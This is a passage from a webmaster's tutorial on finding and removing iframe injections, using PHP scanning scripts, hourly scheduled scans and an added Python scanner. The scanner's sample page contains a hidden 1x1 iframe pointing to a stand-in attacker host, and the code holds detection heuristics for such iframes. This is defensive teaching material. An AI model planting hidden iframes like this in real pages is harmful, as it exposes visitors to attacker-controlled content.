s=webpage.ext

You can thus create simple internet URL shortcuts that you can click on to check the required web pages.

When the script tests for iframe injections, it is basically looking for the text "iframe" and so will display any web page that has the text "iframe". You need to ensure that the iframe being displayed is actually a malicious iframe, similar to the example shown previously. Sometimes it may be a legitimate iframe. Be absolutely sure before you delete it from your web page.

The "clean.php" iframe injection tool is quite useful when testing individual pages. However, as your website grows, you will need a URL link for every web page (webpage.ext), and checking each individual web page for iframe injection becomes a time-consuming effort.

A website that gives a free script to test all the files on a website for iframe injection is given at the following link:

http://www.websanity.co.uk/blog/2009/08/scan-website-files-for-iframe-injection.html

The file is called "detect-signature.php"

When you have downloaded the file, there are a couple of lines in the script that I suggest you change. This will help make the script more suitable for your website.

Using your notepad editor, open the file. First locate the following line:

define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls"); // Ignore files of these types

You will see that the script will ignore files with extensions jpg, pdf, zip, etc. You can add or delete extensions as you feel necessary.

Next, locate the following line:

define("IGNORE_BEFORE", strtotime('2009-08-01') );

The file will ignore any web pages created before August 1, 2009. You may want to change this to ensure all your website files are tested. You could simply change 2009 to 2008.

You will be downloading the "detect-signature.php" as a zip file. After download, extract the file. Using the notepad editor, open the file and change the suggested lines to what suits your needs and re-save. Upload the file to the root directory of your website.

To activate, you need to create the following URL for your domain:

http://www.yourdomain_name/detect-signature.php

You can either create a URL short cut or else copy and paste the URL into your browser. Put in your exact domain name for "yourdomain_name".

When the file is activated, it initially starts by checking every file and web page on your website, unless you have excluded it.

Once the scan is complete, you have two more options you can use for scanning for iframe injection. You can either have the scan stop at the first error (iframe injection) or have it display all errors (all files and web pages with iframe injection). You can continuously click on any of the three links on the web page scan results.

When you do find iframe injections, you need to evaluate if the iframe injection is of the malicious form as indicated previously. If it is, you need to remove it from your web page. Open up your web page with a notepad editor if you have entered your site via FTP, find the iframe injection, delete it and re-save your web page. If you have a complete up-to-date backup of your web page, you can just upload it to your website. It will over-write the web page with the iframe injection.

What I like about this file is that it can check every web page on your website. Although the primary intent is to check all the index.* web pages, checking your other web pages is an added benefit as they might also be attacked. Just make sure that whenever you do find an iframe injection, it is really a malicious iframe.
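The scan and the malicious-versus-legitimate check described in Step 3 can also be run against a local copy of the site. The following is an added Python example, not the code of clean.php or detect-signature.php; the hidden-iframe heuristics, `SAMPLE_PAGE` and the function names are assumptions of this example.

```python
import os
import re
import time

# Same two settings quoted above from detect-signature.php (cutoff moved to 2008).
IGNORE_EXTENSIONS = {"jpg", "pdf", "zip", "psd", "doc", "gif", "swf", "xls"}
IGNORE_BEFORE = time.mktime(time.strptime("2008-08-01", "%Y-%m-%d"))
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTRIBUTE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Constructed sample page: one hidden 1x1 iframe and one ordinary visible embed.
SAMPLE_PAGE = (
    '<html><body>\n'
    '<iframe src="http://www.example-hacker-site.com/inject/" width="1" '
    'height="1" style="visibility: hidden"></iframe>\n'
    '<iframe src="https://maps.example.org/embed" width="600" height="400"></iframe>\n'
    '</body></html>\n')

def hidden_reasons(attrs):
    """List the traits that make an iframe invisible to a visitor."""
    style = attrs.get("style", "").replace(" ", "").lower()
    reasons = [d + "=" + attrs[d] for d in ("width", "height")
               if re.fullmatch(r"[01](px)?", attrs.get(d, "").strip().lower())]
    return reasons + [m for m in ("visibility:hidden", "display:none") if m in style]

def scan_text(text):
    """Yield (line_number, src, hidden_reasons) for each iframe tag in text."""
    for tag in IFRAME_TAG.finditer(text):
        attrs = {m[1].lower(): m[2] or m[3] or m[4] or ""
                 for m in ATTRIBUTE.finditer(tag[1])}
        line = text.count("\n", 0, tag.start()) + 1
        yield line, attrs.get("src", ""), hidden_reasons(attrs)

def scan_tree(root, ignore_before=IGNORE_BEFORE):
    """Walk root and return (relative_path, line, src, reasons) per iframe."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lstrip(".").lower()
            if ext in IGNORE_EXTENSIONS or os.path.getmtime(path) < ignore_before:
                continue  # skipped file type, or not modified since the cutoff
            with open(path, encoding="utf-8", errors="replace") as handle:
                for line, src, reasons in scan_text(handle.read()):
                    findings.append((os.path.relpath(path, root), line, src, reasons))
    return sorted(findings)

if __name__ == "__main__":
    for line, src, reasons in scan_text(SAMPLE_PAGE):
        print(line, src, "HIDDEN: " + ", ".join(reasons) if reasons else "visible")
```

Like the two PHP scripts, this only sees literal iframe tags in the files. An empty reasons list means the iframe is visible, not that it is safe, so the src of every hit still needs a manual look.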

Step 4

Having the ability to manually check for iframe injections goes a long way in helping keep your website secure. The final step now is to automate the iframe scanning in case you forget. This will be your constant watch dog.

The best way to do this is to schedule the iframe scanning, say every hour. A nice free System Scheduler can be found at:

http://www.splinterware.com/download/index.htm

Once you have downloaded the System Scheduler, install it. We will schedule the file "detect-signature.php" on your website to run a scan every hour.

As mentioned previously, there are three ways to run the file. We can check and display all files, stop at the first error, or check and display errors only. The error is the iframe injection. We will use the 3rd option so we will need to use the following URL in the System Scheduler:

http://www.yourdomain_name/detect-signature.php?display_errors_only

When the file runs, it will show any iframe infected files. If you see errors, you need to take immediate action.

We will now schedule the file. Open System Scheduler. Select the "Action" menu and then select "New Event". You should now be in the Event dialog box. For Event type you can leave "Run Application". Give the event a title such as "iFrame Injection Scan". In the Application box, input the complete URL to display errors only, with your actual domain name. In "Working Dir" put any directory on your computer. In the "State" box, select Maximized.

We now need to schedule when we want to run the scan. Select the "Schedule" tab. For "Schedule Type", select "Every Hour / Selected Minutes". In the left bottom boxes, select "Every Hour" and "On The Hour". This means the scan will run, e.g. at 1:00 pm, 2:00 pm, 3:00 pm, etc., for the daily 24 hour time frame. Now go to the "Action" menu and Save and Exit. You should see the System Scheduler icon in your right bottom tool bar. This icon must always be displayed in order for the event to run.

Every hour on the hour, your web page will be activated and your website scanned for iframe injections. Look over the results and take action if necessary, otherwise close the web page. If you do not close the page, you will see multiple web pages of the same thing. You simply need to look them over and close them. If you are running the scan constantly over night, you will see the multiple web pages in the morning.

You do not have to run every hour on the hour. You can select whatever time schedule you prefer. If you have been attacked, I strongly recommend you stay with hourly scanning.

To make things a bit clearer, I added the date and time in the "detect-signature.php" file so that I knew the exact date and time the scan was made. You can search the internet for JavaScript that you can add. It is very easy to do and will give order to your scanning.

Step 5

If you follow all the measures stated in this document, you will prevent your website from becoming a victim of iframe injection attacks. It is also important to note that your website may not be the only victim. Your home PC may also be a victim. You must also have preventative measures on your PC. Make sure you read the article "Website Protection Against iFrame Injections" as mentioned previously. This is a must.

Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.